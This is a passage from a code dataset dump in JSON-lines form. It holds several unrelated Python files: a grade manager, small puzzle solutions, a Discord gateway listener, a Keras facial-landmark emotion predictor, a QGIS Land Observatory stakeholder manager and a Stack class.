int(list_pai[n][4]) < int(list_pai[n+1][4]):\r\n temp = list_pai[n]\r\n list_pai[n] = list_pai[n + 1]\r\n list_pai[n + 1] = temp\r\n list_pai[len(list_pai)-m-1][5]=str(num)\r\n num -= 1\r\n\r\n #print(list_pai)\r\n wp_grade = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'w')\r\n wp_grade = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'a')\r\n wp_grade.write('姓名\\t语文\\t数学\\t英语\\t总分\\t名次\\n')\r\n for i in list_pai:\r\n wp_grade.write(i[0]+'\\t\\t'+i[1]+'\\t\\t'+i[2]+'\\t\\t'+i[3]+'\\t\\t'+i[4]+'\\t\\t'+i[5]+'\\n')\r\n wp_grade.close()\r\ndef show_menu():\r\n print('*' * 50)\r\n print(\"欢迎使用【成绩管理系统】V1.0\")\r\n print(\"1. 录入成绩\")\r\n print(\"2. 显示全部\")\r\n print(\"3. 查询成绩\")\r\n print(\"0. 退出系统\")\r\n print('*' * 50)\r\n\r\n\r\ndef new_grade():\r\n print(\"-\" * 50)\r\n print(\"功能:录入成绩\")\r\n name = input(\"请输入姓名:\")\r\n try:\r\n read_grade = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'r')\r\n read_grade.close()\r\n except:\r\n write_grade = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'w')\r\n write_grade.write('姓名\\t语文\\t数学\\t英语\\t总分\\t名次\\n')\r\n write_grade.close()\r\n read_grade = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'r')\r\n while True:\r\n new_read = read_grade.readline()\r\n if len(new_read) == 0:\r\n break\r\n if name == new_read[:len(name)]:\r\n print('该姓名已存在,请重新输入')\r\n name = input(\"请输入姓名:\")\r\n read_grade.close()\r\n read_grade = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'r')\r\n while True:\r\n try:\r\n chinese = input(\"请输入语文成绩:\")\r\n maths = input(\"请数学成绩:\")\r\n english = input(\"请输入英语成绩:\")\r\n zong = int(chinese) + int(maths) + int(english)\r\n break\r\n except:\r\n print('请确保成绩是数字')\r\n dict = {'name': name, 'Chinese': chinese, 'Maths': maths, 'English': english, 'zong': str(zong)}\r\n list.append(dict)\r\n write_grade = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'a')\r\n write_grade.write(\r\n dict['name'] + '\\t\\t' + dict['Chinese'] + '\\t\\t' + dict['Maths'] + '\\t\\t' + dict['English'] + '\\t\\t' + dict[\r\n 'zong'] +'\\t\\t'+ '\\n')\r\n read_grade.close()\r\n write_grade.close()\r\n\r\n # print(list)\r\n print(\"成功添加%s的成绩,具体信息如下:\" % dict['name'])\r\n for i in ['姓名', '语文', '数学', '英语', '总分']:\r\n print(i, end='\\t')\r\n print()\r\n print(\"%s\\t\\t%s\\t\\t%s\\t\\t%s\\t\\t%s\" % (dict['name'], dict['Chinese'], dict['Maths'], dict['English'],dict['zong']))\r\n paixu()\r\n over = input(\"输入任意键回到主菜单:\")\r\n\r\n\r\ndef show_all():\r\n print(\"-\" * 50)\r\n print(\"功能:显示全部\")\r\n try:\r\n read_grade = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'r')\r\n text = read_grade.read()\r\n print(text)\r\n read_grade.close()\r\n except:\r\n print('现在没有任何记录,请先录入成绩再来查询')\r\n over = input(\"输入任意键回到主菜单:\")\r\n\r\n\r\ndef search_grade():\r\n print(\"-\" * 50)\r\n print(\"功能:查询成绩\")\r\n try:\r\n\r\n read_grade = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'r')\r\n read_grade2 = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'r')\r\n text2 = read_grade2.read()\r\n\r\n write_grade2 = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测副本/学生成绩副本.txt\", 'w')\r\n write_grade1 = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测副本/学生成绩修改.txt\", 'w')\r\n write_grade1 = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测副本/学生成绩修改.txt\", 'a')\r\n write_grade2.write(text2)\r\n read_grade2.close()\r\n write_grade2.close()\r\n file_name = input(\"请输入你要查询的姓名:\")\r\n count = 0\r\n while True:\r\n text = read_grade.readline()\r\n if len(text) == 0:\r\n break\r\n if file_name == text[:len(file_name)]:\r\n count = 1\r\n for i in ['姓名', '语文', '数学', '英语', '总分','名次']:\r\n print(i, end='\\t')\r\n print()\r\n print(text)\r\n\r\n def deal(action):\r\n if action == '1':\r\n print(\"开始修改,如果此项不修改直接回车则默认为原来数据.\")\r\n\r\n def input_grade_info(dict_value, tip_message):\r\n result_str = input(tip_message)\r\n if len(result_str) > 0:\r\n return result_str\r\n else:\r\n return dict_value\r\n\r\n dname = file_name\r\n student_name = input_grade_info(file_name, \"请输入姓名:\")\r\n w_grade2 = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测副本/学生成绩副本.txt\", 'a')\r\n w_grade2.write(student_name)\r\n w_grade2.close()\r\n count = 0\r\n read_grade2 = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测副本/学生成绩副本.txt\", 'r')\r\n while True:\r\n text2 = read_grade2.readline()\r\n\r\n if len(text2) == 0:\r\n break\r\n if text2[:len(student_name)] == dname:\r\n text2 = read_grade2.readline()\r\n if student_name == text2[:len(student_name)]:\r\n count += 1\r\n if count == 2:\r\n count = 0\r\n print('姓名已存在,请重新修改')\r\n student_name = dname\r\n read_grade2.close()\r\n w_grade = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测副本/学生成绩副本.txt\", 'w')\r\n r = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'r')\r\n chong = r.read()\r\n w_grade.write(chong)\r\n w_grade.close()\r\n read_grade2 = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测副本/学生成绩副本.txt\", 'r')\r\n student_name = input_grade_info(file_name, \"请输入姓名:\")\r\n w_grade2 = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测副本/学生成绩副本.txt\", 'a')\r\n w_grade2.write(student_name)\r\n w_grade2.close()\r\n read_grade2.close()\r\n while True:\r\n try:\r\n student_chinese = input(\"请输入语文成绩:\")\r\n student_maths = input(\"请输入数学成绩:\")\r\n student_english = input(\"请输入英语成绩:\")\r\n student_zong = int(student_chinese) + int(student_maths) + int(student_english)\r\n break\r\n except:\r\n print('请确保成绩是数字')\r\n write_grade1.write(\r\n student_name + '\\t\\t' + student_chinese + '\\t\\t' + student_maths + '\\t\\t' + student_english + '\\t\\t' + str(student_zong) +'\\t\\t'+ '\\n')\r\n print(\"成绩修改成功,新纪录如下所示:\")\r\n for i in ['姓名', '语文', '数学', '英语', '总分']:\r\n print(i, end='\\t')\r\n print()\r\n print(\r\n student_name + '\\t\\t' + student_chinese + '\\t\\t' + student_maths + '\\t\\t' + student_english + '\\t\\t' + str(student_zong))\r\n over = input(\"输入任意键回到主菜单:\")\r\n elif action == '2':\r\n print(\"删除成功\")\r\n over = input(\"输入任意键回到主菜单:\")\r\n return\r\n elif action == '0':\r\n write_grade1.write(text)\r\n return\r\n else:\r\n print(\"输入错误请重新输入\")\r\n\r\n action = input(\"请输入请选择要执行的操作[1] 修改 [2] 删除 [0] 返回主菜单\")\r\n deal(action)\r\n else:\r\n write_grade1.write(text)\r\n read_grade.close()\r\n write_grade1.close()\r\n read = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测副本/学生成绩修改.txt\", 'r')\r\n write = open(\"C:/Users/Administrator/PycharmProjects/new/第一月检测/学生成绩.txt\", 'w')\r\n # write.write('姓名 语文 数学 英语\\n')\r\n test = read.read()\r\n write.write(test)\r\n read.close()\r\n write.close()\r\n paixu()\r\n if count == 0:\r\n print(\"%s没有录入成绩\" % file_name)\r\n over = input(\"输入任意键回到主菜单:\")\r\n return\r\n\r\n print(\"%s没有录入成绩\" % file_name)\r\n over = input(\"输入任意键回到主菜单:\")\r\n except:\r\n print('现在没有任何记录,请先录入成绩再来查询')\r\n over = input(\"输入任意键回到主菜单:\")\r\n return\r\n","sub_path":"第一月项目/grade_tools.py","file_name":"grade_tools.py","file_ext":"py","file_size_in_byte":12589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"65380634","text":"'''\n We know the content of the evaporator (content in ml), the percentage of foam\n or gas lost every day (evap_per_day) and the threshold (threshold)\n in percentage beyond which the evaporator is no longer useful.\n All numbers are strictly positive.\n\n The program reports the nth day (as an integer) on which the evaporator\n will be out of use.\n\n Simplly says: calculate the life cycle when the content still useful.\n Threshold is the percentage of content that is not useful\n'''\ndef evaporator(content,evap_per_day, threshold):\n count=0\n test = content\n while test>= (content * threshold)/100.0:\n test = test- (test * 0.01 * evap_per_day)\n count+=1\n\n return count\n\nprint(evaporator(10,10,10))","sub_path":"python/evaporator.py","file_name":"evaporator.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"171765455","text":"#!/Users/geert/opt/anaconda3/bin/python3\n\ndef count_unique_answers_for_group(g):\n return len(set(g.replace(\"\\n\",\"\")))\n\ndef count_all_answers_for_group(g):\n # for group g, find which answer was given by all\n answers = list(map(set,g.split(\"\\n\")))\n all_given = answers[0].intersection(*answers)\n return len(all_given)\n\nif __name__ == \"__main__\":\n testinput = \"\"\"abc\n\na\nb\nc\n\nab\nac\n\na\na\na\na\n\nb\"\"\"\n import re\n testgroups = re.split(\"\\n\\n\", testinput)\n assert 11 == sum(map(count_unique_answers_for_group,testgroups)), \"test case 1 failed\"\n \n from aoc_utils import load_list\n groups = load_list(\"input/d06_pt1.txt\",\"\\n\\n\")\n # print(groups)\n \n ans1 = sum(map(count_unique_answers_for_group, groups))\n print(f\"Answer part 1: {ans1}\")\n \n ## Part 2\n assert 6 == sum(map(count_all_answers_for_group, testgroups)), \"test case 2 failed\"\n \n ans2 = sum(map(count_all_answers_for_group, groups))\n print(f\"Answer part 2: {ans2}\")","sub_path":"day06.py","file_name":"day06.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"2182211","text":"import websockets, asyncio, json, threading\n\nfrom colorama import Fore, init\ninit(convert=True)\n\ntoken = ''\n\nclass Client:\n def __init__(self, token: str):\n self.token = token\n self.heartbeat = None\n self.socket = None\n self.sessionID = None\n self.seq = None\n \n async def resume(self):\n if self.socket == None:\n return\n\n if self.socket.close_code == 1001:\n await self.send(json.dumps({\n \"token\": token,\n \"session_id\": self.sessionID,\n \"seq\": self.seq\n }))\n\n async def connect(self):\n self.socket = await websockets.connect(\"wss://gateway.discord.gg/?encoding=json&v=6\")\n self.heartbeat = json.loads((await self.socket.recv()))['d']['heartbeat_interval']\n\n async def identify(self):\n if self.socket == None:\n await self.connect()\n\n await self.socket.send(json.dumps({\n \"op\":2,\n \"d\": { \n \"token\": token,\n \"properties\":{\n \"os\":\"MomOS\",\n \"browser\":\"Pixels\",\n \"device\":\"\",\n \"browser_user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36\",\n \"os_version\":\"xp\"\n }\n }}))\n\n self.sessionID = json.loads(await self.socket.recv())['d']['session_id']\n\n async def send(self, _data: json.dumps):\n if self.socket == None:\n await self.identify()\n \n await self.socket.send(_data)\n\n print(Fore.GREEN + await self.socket.recv() + \"\\n\")\n\n async def messages(self):\n if self.socket == None:\n await self.identify()\n\n while True:\n _data = (await self.socket.recv())\n self.seq = json.loads(_data)['s']\n print( Fore.CYAN + _data + \"\\n\")\n\nasyncio.run(Client(token).messages())\n","sub_path":"SocketClient/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"156474729","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n# os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"2\"\n\nimport numpy as np\nimport keras\n## VGGFACE MODEL\nfrom keras.engine import Model\nfrom keras.layers import Concatenate, Add, Dropout, Flatten, Dense, Input, GlobalAveragePooling2D, GaussianDropout\nfrom keras.preprocessing import image\nfrom keras_vggface.vggface import VGGFace\nfrom keras_vggface import utils\nfrom keras.callbacks import ModelCheckpoint\n\nfrom keras.models import load_model\nfrom keras.regularizers import l2\n\n\nfrom keras.datasets import cifar10\nimport matplotlib.pyplot as plt\nimport cv2\n\nimport sys\nsys.path.insert(0, '../data/')\nfrom data import read_preprocessed_face_data\n\nfrom myutils import my_ccc_loss, siamese_kpts_generator, myeval, prewhiten, get_aligned_indexes, preds2csv\nimport pandas as pd\nimport collections\nimport itertools\n\nnp.random.seed(1337)\n__VIDEO_SEQ_LEN__ = 9\n__N_CLASSES__ = 7\n__EMOTIONS__ = True\n\n__RES_FN__ = '/data/pmmf/OMG/KPTS/grid_wo_norm_mlayers_test/'\n__MODELS_FN__ = '/data/pmmf/OMG/KPTS/grid_wo_norm_mlayers/'\n\nif not os.path.exists(__RES_FN__):\n os.makedirs(__RES_FN__)\n\nfrom keras import backend as K\nprint('image_data_format: ', K.image_data_format())\n\n\ndef myfit(model, x_train, y_train, x_val, y_val, lr=1e-04, loss_weights={'out_arousal': 1., 'out_valence': 1}, epochs=4, batch_size=64, weightspath=\"./tmp/weights_top.hdf5\"):\n \n if __EMOTIONS__:\n # compile model \n model.compile(optimizer=keras.optimizers.Adam(lr=lr), \n loss={'out_arousal': my_ccc_loss, 'out_valence': my_ccc_loss, 'out_categorical': keras.losses.categorical_crossentropy},\n loss_weights=loss_weights)\n else:\n # compile model \n model.compile(optimizer=keras.optimizers.Adam(lr=lr), \n loss={'out_arousal': my_ccc_loss, 'out_valence': my_ccc_loss},\n loss_weights=loss_weights)\n\n # checkpoint\n checkpoint = ModelCheckpoint(weightspath, monitor='val_loss', verbose=1, save_best_only=True, mode='min')\n callbacks_list = [checkpoint]\n\n # generators\n gen_train = siamese_kpts_generator(x_train, y_train, batch_size, augmentation=True, emotions=__EMOTIONS__)\n gen_val = siamese_kpts_generator(x_val, y_val, batch_size, augmentation=False, emotions=__EMOTIONS__)\n\n x_train_len = x_train['frame_0'].shape[0]\n x_val_len = x_val['frame_0'].shape[0]\n\n \n # fit\n model.summary()\n model.fit_generator(gen_train,\n epochs=epochs,\n validation_data=gen_val,\n verbose=1,\n steps_per_epoch=(x_train_len/batch_size),\n validation_steps=(x_val_len/batch_size),\n callbacks=callbacks_list)\n\n\n model.load_weights(weightspath)\n\n return model\n\ndef siamese_encoder(input_shape, n_dense=2, hidden_dim=256, l2_reg=1e-04):\n base = base_encoder(input_shape, hidden_dim, l2_reg)\n inputs = [Input(shape=input_shape, name='frame_'+str(i)) for i in range(__VIDEO_SEQ_LEN__)]\n\n shared_streams = [base(i) for i in inputs]\n x = Concatenate()(shared_streams)\n for i in range(n_dense):\n name='fc' + str(i + 3)\n x = Dense(hidden_dim//4, activation='relu', kernel_regularizer=l2(l2_reg), name=name)(x)\n x = Dropout(0.4)(x)\n out_arousal = Dense(1, activation='sigmoid', name='out_arousal')(x)\n out_valence = Dense(1, activation='tanh', name='out_valence')(x)\n if __EMOTIONS__:\n out_categorical = Dense(__N_CLASSES__, activation='softmax', name='out_categorical')(x)\n siamese_encoder = Model(inputs, [out_arousal, out_valence, out_categorical])\n else:\n siamese_encoder = Model(inputs, [out_arousal, out_valence])\n siamese_encoder.summary()\n return siamese_encoder\n\ndef base_encoder(input_shape, hidden_dim, l2_reg):\n input = Input(shape=input_shape)\n x = Dense(hidden_dim, activation='relu', input_shape=input_shape, kernel_regularizer=l2(l2_reg))(input)\n x = Dense(hidden_dim//2, activation='relu', kernel_regularizer=l2(l2_reg))(x)\n return Model(input, x)\n\ndef mydiff(d):\n diff = {}\n for ii in range(1, __VIDEO_SEQ_LEN__):\n if ii == 1:\n diff['frame_0'] = d['frame_'+str(ii)] - d['frame_'+str(ii-1)]\n diff['frame_'+str(ii)] = d['frame_'+str(ii)] - d['frame_'+str(ii-1)]\n return diff\n\n## READ DATA\ntrain_fn = '../pre-process/Train_face_data.pckl'\nval_fn = '../pre-process/Validation_face_data.pckl'\ntest_fn = '../pre-process/Test_face_data.pckl'\n\nx_train, kpts_train, arousal_train, valence_train, emotion_train, groups_train, folder_train, \\\nx_val, kpts_val, arousal_val, valence_val, emotion_val, groups_val, folder_val, \\\nx_test, kpts_test, groups_test, folder_test = read_preprocessed_face_data(train_fn, val_fn, test_fn=test_fn)\n\nx_train_len = x_train.shape[0] / __VIDEO_SEQ_LEN__\nx_val_len = x_val.shape[0] / __VIDEO_SEQ_LEN__\nx_test_len = x_test.shape[0] / __VIDEO_SEQ_LEN__\n\ntrain_gt_fn = '/data/DB/OMG/omg_TrainVideos.csv'\nval_gt_fn = '/data/DB/OMG/omg_ValidationVideos.csv'\ntest_gt_fn = '/data/DB/OMG/omg_TestVideos_WithoutLabels.csv'\naligned_val_indexes, gt_arousal, gt_valence = get_aligned_indexes(val_gt_fn, folder_val)\naligned_test_indexes = get_aligned_indexes(test_gt_fn, folder_test, test=True)\n\n## COMPUTE KPTS-FEATS\nfrom feat_kpts_geometry import feat_kpts_geometry\nfrom sklearn.preprocessing import StandardScaler\n\nfeat_kpts = feat_kpts_geometry()\n# train\ntrain_feats = feat_kpts.describe(kpts_train)\nscaler = StandardScaler()\nscaler.fit(train_feats)\ntrain_feats = scaler.transform(train_feats)\n\n# val\nval_feats = feat_kpts.describe(kpts_val)\nval_feats = scaler.transform(val_feats)\n\n# test\ntest_feats = feat_kpts.describe(kpts_test)\ntest_feats = scaler.transform(test_feats)\n\n## PRE-PROCESSING\nx_train = x_train.astype('float32') / 255\nx_val = x_val.astype('float32') / 255\nx_test = x_test.astype('float32') / 255\n\nkpts_train = kpts_train.astype('float32') / 96\nkpts_val = kpts_val.astype('float32') / 96\nkpts_test = kpts_test.astype('float32') / 96\n\nkpts_train_siamese = dict(('frame_'+str(i), kpts_train[i::__VIDEO_SEQ_LEN__,:,:2].reshape(-1, 68*2)) for i in range(__VIDEO_SEQ_LEN__))\nkpts_val_siamese = dict(('frame_'+str(i), kpts_val[i::__VIDEO_SEQ_LEN__,:,:2].reshape(-1, 68*2)) for i in range(__VIDEO_SEQ_LEN__))\nkpts_test_siamese = dict(('frame_'+str(i), kpts_test[i::__VIDEO_SEQ_LEN__,:,:2].reshape(-1, 68*2)) for i in range(__VIDEO_SEQ_LEN__))\n\ntrain_feats_siamese = dict(('frame_'+str(i), train_feats[i::__VIDEO_SEQ_LEN__,:]) for i in range(__VIDEO_SEQ_LEN__))\nval_feats_siamese = dict(('frame_'+str(i), val_feats[i::__VIDEO_SEQ_LEN__,:]) for i in range(__VIDEO_SEQ_LEN__))\ntest_feats_siamese = dict(('frame_'+str(i), test_feats[i::__VIDEO_SEQ_LEN__,:]) for i in range(__VIDEO_SEQ_LEN__))\n\n\ndiff_train = mydiff(kpts_train_siamese)\ndiff_val = mydiff(kpts_val_siamese)\ndiff_test = mydiff(kpts_test_siamese)\n\ndiff2_train = mydiff(mydiff(kpts_train_siamese))\ndiff2_val = mydiff(mydiff(kpts_val_siamese))\ndiff2_test = mydiff(mydiff(kpts_test_siamese))\n\ncombo_train = {}\ncombo_val = {}\ncombo_test = {}\nfor ii in range(__VIDEO_SEQ_LEN__):\n combo_train['frame_'+str(ii)] = np.concatenate((kpts_train_siamese['frame_'+str(ii)], diff_train['frame_'+str(ii)], diff2_train['frame_'+str(ii)], train_feats_siamese['frame_'+str(ii)]), axis=1)\n combo_val['frame_'+str(ii)] = np.concatenate((kpts_val_siamese['frame_'+str(ii)], diff_val['frame_'+str(ii)], diff2_val['frame_'+str(ii)], val_feats_siamese['frame_'+str(ii)]), axis=1)\n combo_test['frame_'+str(ii)] = np.concatenate((kpts_test_siamese['frame_'+str(ii)], diff_test['frame_'+str(ii)], diff2_test['frame_'+str(ii)], test_feats_siamese['frame_'+str(ii)]), axis=1)\n\nif __EMOTIONS__:\n emotion_train = keras.utils.to_categorical(emotion_train, __N_CLASSES__)\n emotion_val = keras.utils.to_categorical(emotion_val, __N_CLASSES__)\n\n y_train = {'out_arousal': arousal_train, 'out_valence': valence_train, 'out_categorical': emotion_train}\n y_val = {'out_arousal': arousal_val, 'out_valence': valence_val, 'out_categorical': emotion_val}\nelse:\n y_train = {'out_arousal': arousal_train, 'out_valence': valence_train}\n y_val = {'out_arousal': arousal_val, 'out_valence': valence_val}\n\n## Grid parameters\ngrid_param = collections.OrderedDict()\ngrid_param = {'loss_weights': [{'out_arousal': 1., 'out_valence': 1., 'out_categorical': .1}, \\\n {'out_arousal': 1., 'out_valence': .5, 'out_categorical': .1}, \\\n {'out_arousal': .5, 'out_valence': .1, 'out_categorical': .1}, \\\n {'out_arousal': 1., 'out_valence': .25, 'out_categorical': .05}, \\\n {'out_arousal': .25, 'out_valence': .1, 'out_categorical': .05}], \\\n 'l2_reg': np.float32(np.logspace(-3, -5, 3)),\\\n 'n_dense': [1, 2, 3], \\\n 'hidden_dim': [256, 512]}\n\ncombinations = list(itertools.product(*(grid_param[k] for k in sorted(grid_param))))\nprint(\">> GRID combos: \", len(combinations))\nf_grid_fn = __RES_FN__ + 'grid_kpts_wo_norm.log'\nfor idx, combo in enumerate(combinations):\n print('>> COMBO: ' + str(idx))\n dict_combo = {k: combo[i] for i, k in enumerate(sorted(grid_param))}\n print(\"combo \" + str(idx) + ': ', dict_combo)\n\n ## MLP MODEL\n top_modelpath= __MODELS_FN__ + str(idx) + '_model_top_ktps.h5'\n siamese_mlp = load_model(top_modelpath, custom_objects={'my_ccc_loss': my_ccc_loss})\n\n # predictions\n preds = siamese_mlp.predict(combo_test)\n preds_arousal = preds[0].ravel()[aligned_test_indexes]\n preds_valence = preds[1].ravel()[aligned_test_indexes]\n\n # save predtions to csv\n csv_fn = __RES_FN__ + str(idx) + '_preds_model_top_ktps.csv'\n preds2csv(csv_fn, test_gt_fn, preds_arousal, preds_valence)\n \n K.clear_session()\n","sub_path":"video_modality/landmarks_predict.py","file_name":"landmarks_predict.py","file_ext":"py","file_size_in_byte":10068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"309481181","text":"\"\"\"\n/***************************************************************************\nlo-editor\nA QGIS plugin to add and edit spatial information to land deals on the Land\nObservatory platform.\n -------------------\nbegin : 2012-07-02\ncopyright : (C) 2012 by Adrian Weber\nemail : adrian.weber@cde.unibe.ch\n ***************************************************************************/\n\n/***************************************************************************\n * *\n * This program is free software; you can redistribute it and/or modify *\n * it under the terms of the GNU General Public License as published by *\n * the Free Software Foundation; either version 2 of the License, or *\n * (at your option) any later version. *\n * *\n ***************************************************************************/\n\"\"\"\n\nfrom PyQt4.QtCore import QObject\nfrom PyQt4.QtCore import QRegExp\nfrom PyQt4.QtCore import QSettings\nfrom PyQt4.QtCore import QString\nfrom PyQt4.QtCore import SIGNAL\nfrom PyQt4.QtGui import QMessageBox\nfrom RequestManager import RequestManager\nfrom models import Activity\nfrom models import Stakeholder\nfrom models import Tag\nfrom models import TagGroup\nimport os\nfrom protocols import ActivityProtocol\nfrom protocols import StakeholderProtocol\nfrom qgis.core import QGis\nfrom qgis.core import QgsFeature\nfrom qgis.core import QgsField\nfrom qgis.core import QgsGeometry\nfrom qgis.core import QgsMapLayer\nfrom qgis.core import QgsMapLayerRegistry\nfrom qgis.core import QgsPoint\nfrom qgis.core import QgsVectorLayer\nimport simplejson as json\n\nclass StakeholderRequestManager(RequestManager):\n\n configFile = \"landmatrix.stakeholder.ini\"\n\n def __init__(self, host, user, pw):\n RequestManager.__init__(self, host, user, pw)\n\n self.stakeholderProtocol = StakeholderProtocol(host, user, pw)\n\n\n def getStakeholders(self):\n # Connect to the stylePosted signal emitted by the GeoServer object\n self.connect(self.stakeholderProtocol, SIGNAL(\"readSignal( bool, int, QString )\"), self.getStakeholdersFinished)\n\n url = self.stakeholderProtocol.read(queryable=\"Name,Country\", Name__ilike='Heng', Country__ilike='cambodia')\n self.log(url)\n\n def getStakeholdersFinished(self, success, statusCode, response):\n\n # It's necessary to disconnect this signal again\n self.disconnect(self.stakeholderProtocol, SIGNAL(\"readSignal( bool, int, QString )\"), self.getStakeholdersFinished)\n\n if success:\n # Parse the result\n stakeholders = self.parseStakeholdersResponse(response)\n\n # Get the first Uuid of the list\n if len(stakeholders) >= 1:\n self.log(stakeholders[0].id().toString())\n\n def parseStakeholdersResponse(self, jsonBody):\n\n stakeholders = []\n\n data = json.loads(str(jsonBody))\n for stakeholder in data['data']:\n\n s = Stakeholder(id=stakeholder['id'], version=stakeholder['version'])\n\n for taggroup in stakeholder['taggroups']:\n tg = TagGroup(id=taggroup['id'])\n mainTag = taggroup['main_tag']\n tg.setMainTag(Tag(id=mainTag['id'], key=mainTag['key'], value=mainTag['value']))\n\n for tag in taggroup['tags']:\n t = Tag(id=tag['id'], key=tag['key'], value=tag['value'])\n tg.addTag(t)\n\n s.addTagGroup(tg)\n\n stakeholders.append(s)\n\n return stakeholders\n\n def addStakeholders(self):\n self.connect(self.stakeholderProtocol, SIGNAL(\"created( bool, int, QString\"), self.addStakeholdersFinished)\n\n # Dummy stakeholder\n s = Stakeholder()\n tag = Tag(key=\"Name\", value=\"Adrian Weber Investment\")\n tagGroup = TagGroup()\n tagGroup.setMainTag(tag)\n tagGroup.addTag(tag)\n tagGroup.addTag(Tag(key=\"Country\", value=\"Swaziland\"))\n s.addTagGroup(tagGroup)\n\n msg, rawBody = self.stakeholderProtocol.add(s)\n self.log(msg)\n self.log(rawBody)\n\n def addStakeholdersFinished(self, success, statusCode, response):\n\n # Disconnect this signal\n self.disconnect(self.stakeholderProtocol, SIGNAL(\"created( bool, int, QString\"), self.addStakeholdersFinished)\n\n self.log(statusCode)\n\n def addStakeholdersFromLayer(self):\n \"\"\"\n Import all stakeholders from the active layer to the Land Observatory\n platform.\n It is not (yet) tested if a stakeholder already exists or not.\n \"\"\"\n\n # Connect to the protocol to get noticed as soon as the stakeholder has\n # been created\n self.connect(self.stakeholderProtocol, SIGNAL(\"created( bool, int, QString\"), self.addStakeholdersFinished)\n\n # Get the dict maps the attribute names from the landmatrix input Shapefile to the\n # fields defined in the global definition yaml\n identifierColumn, transformMap, groups = self.getTagGroupsConfiguration(\"landmatrix.stakeholder.ini\")\n\n # Get the active layer and its data provider\n layer = self.iface.activeLayer()\n provider = layer.dataProvider()\n\n # The current feature\n feature = QgsFeature()\n\n # List of attribute indexes to select\n attributeIndexes = []\n # Dict that maps the field index to the fields defined in the global YAML\n fieldIndexMap = {}\n for (i, field) in provider.fields().iteritems():\n if str(field.name()) in transformMap:\n attributeIndexes.append(i)\n fieldIndexMap[i] = transformMap[str(field.name())]\n\n # Start data retreival: fetch geometry and necessary attributes for each feature\n provider.select(attributeIndexes)\n\n stakeholders = []\n\n # retreive every feature with its geometry and attributes\n while provider.nextFeature(feature):\n\n tagGroups = list(TagGroup() for i in range(len(groups)))\n\n # fetch map of attributes\n attrs = feature.attributeMap()\n\n # attrs is a dictionary: key = field index, value = QgsFeatureAttribute\n # show all attributes and their values\n for (k, attr) in attrs.iteritems():\n self.log(\"%s: %s\" % (fieldIndexMap[k], attr.toString()))\n\n # First search the correct taggroup to append\n attributeName = provider.fields()[k].name()\n currentTagGroup = 0\n for g in groups:\n if attributeName in g:\n break\n else:\n currentTagGroup += 1\n\n if attr is not None and attr.toString() != '':\n tag = Tag(key=fieldIndexMap[k], value=attr.toString())\n tagGroups[currentTagGroup].addTag(tag)\n if tagGroups[currentTagGroup].mainTag() is None:\n tagGroups[currentTagGroup].setMainTag(tag)\n\n s = Stakeholder()\n for tg in tagGroups:\n if len(tg.tags) > 0:\n s.addTagGroup(tg)\n\n stakeholders.append(s)\n\n msg, rawBody = self.stakeholderProtocol.add(stakeholders)\n self.log(msg)\n self.log(rawBody)\n\n # Disconnect the signal\n self.disconnect(self.stakeholderProtocol, SIGNAL(\"created( bool, int, QString\"), self.addStakeholdersFinished)\n\n def addStakeholdersFromLayerFinished(self, success, statusCode, response):\n\n if success:\n pass\n","sub_path":"src/StakeholderRequestManager.py","file_name":"StakeholderRequestManager.py","file_ext":"py","file_size_in_byte":7740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"65968564","text":"class Stack:\r\n def __init__(self, max_size):\r\n self.__max_size = max_size\r\n self.__elements = [None] * self.__max_size\r\n self.__top = -1\r\n\r\n def is_full(self):\r\n if (self.__top == self.__max_size - 1):\r\n return True\r\n return False\r\n\r\n def is_empty(self):\r\n if (self.__top == -1):\r\n return True\r\n return False\r\n\r\n def push(self, data):\r\n if (self.is_full()):\r\n print(\"The stack is full!!\")\r\n else:\r\n self.__top += 1\r\n self.__elements[self.__top] = data\r\n\r\n def pop(self):\r\n if (self.is_empty()):\r\n print(\"The stack is empty!!\")\r\n else:\r\n data = self.__elements[self.__top]\r\n self.__top -= 1\r\n return data\r\n\r\n def display(self):\r\n if (self.is_empty()):\r\n print(\"The stack is empty\")\r\n else:\r\n index = self.__top\r\n while (index >= 0):\r\n print(self.__elements[index])\r\n index -= 1\r\n\r\n def get_max_size(self):\r\n return self.__max_size\r\n\r\n # You can use the below __str__() to print the elements of the DS object while debugging\r\n\r\n def __str__(self):\r\n msg 